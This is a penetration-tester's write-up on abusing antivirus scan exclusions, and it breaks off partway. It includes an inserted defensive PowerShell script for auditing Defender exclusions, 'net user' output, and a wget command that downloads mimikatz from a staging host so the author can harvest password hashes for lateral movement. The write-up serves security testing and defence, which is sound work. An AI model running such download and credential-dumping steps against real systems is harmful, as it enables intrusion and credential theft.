AV bypass is one of the most challenging stages of a penetration test. Sometimes we do not need any bypass method at all, because the AV is not configured correctly or is not licensed, so it does not catch or detect our payloads, enumeration tools and so on. But in general, it can be frustrating.
In this write-up, I do not provide any AV bypass, hiding or encryption method. Sometimes simple methods can be more effective.
As you know, some applications or services are somehow flagged as malicious by endpoint protection software, and vendors advise excluding them from AV scanning. At the end of the day, IT admins add them to the AV scan exclusion list and the related applications or services work as expected.
So, as penetration testers, we want to run our payloads correctly and get a reverse shell, or run our enumeration tools as expected. It is our right, isn't it?
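For the defensive side of this, here is an added example (not from the original post) that audits the Microsoft Defender exclusion list with Get-MpPreference and flags entries an unprivileged user could exploit: paths under user-writable roots, whole-drive or wildcard paths, executable or script extensions, and process exclusions given by bare file name. The list of user-writable roots is an assumption for a typical workstation; extend it for your environment.

```powershell
# Added example (not from the original post): audit Microsoft Defender exclusions
# for entries that would let a standard user drop files the engine never scans.
# Assumes Windows with the Defender PowerShell module; run elevated so
# Get-MpPreference returns the full preference set.

# Constructed list of directories a standard user can normally write into.
$UserWritableRoots = @(
    "$env:SystemDrive\Temp",
    "$env:SystemDrive\Users",
    "$env:ProgramData",
    "$env:SystemRoot\Temp"
)

function Test-RiskyExclusionPath {
    param([Parameter(Mandatory)][string]$Path)
    # Expand %VARS% and drop a trailing backslash so comparisons are consistent.
    $expanded = [Environment]::ExpandEnvironmentVariables($Path).TrimEnd('\')
    foreach ($root in $UserWritableRoots) {
        if ($expanded -eq $root -or $expanded -like "$root\*") { return $true }
    }
    # A whole drive ("C:") or a wildcard-only entry ("*") effectively disables scanning.
    return ($expanded -match '^[A-Za-z]:$' -or $expanded -match '^\*')
}

$pref = Get-MpPreference
$findings = @()

foreach ($p in $pref.ExclusionPath) {
    $findings += [pscustomobject]@{ Type = 'Path'; Value = $p; Risky = (Test-RiskyExclusionPath $p) }
}
foreach ($e in $pref.ExclusionExtension) {
    # Extension exclusions apply everywhere on disk, so executable and script types are high risk.
    $risky = $e -match '^\.?(exe|dll|ps1|bat|cmd|vbs|js|scr)$'
    $findings += [pscustomobject]@{ Type = 'Extension'; Value = $e; Risky = $risky }
}
foreach ($proc in $pref.ExclusionProcess) {
    # A process exclusion covers every file that process opens; a bare file name
    # (no full path) matches any process with that name, wherever it was started from.
    $findings += [pscustomobject]@{ Type = 'Process'; Value = $proc; Risky = (-not ($proc -match '\\')) }
}

# Risky entries first; review each one against the vendor guidance that justified it.
$findings | Sort-Object Risky -Descending | Format-Table -AutoSize
```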
C:\Users\berkan\Desktop>net user berkan
User name                    berkan
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            4/24/2021 8:35:27 PM
Password expires             Never
Password changeable          4/24/2021 8:35:27 PM
Password required            No
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   5/31/2021 6:46:10 PM

Logon hours allowed          All

Local Group Memberships      *Administrators
Global Group memberships     *None
The command completed successfully.

C:\Users\berkan\Desktop>
What luck: the user is a member of the local Administrators group. Well, let's run mimikatz and get some hashes or clear-text passwords for lateral movement.
C:\Temp>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\Temp> wget "http://172.16.255.20/mimikatz/x64/mimikatz.exe" -OutFile "C:\Temp\mimikatz.exe"
PS C:\Temp> dir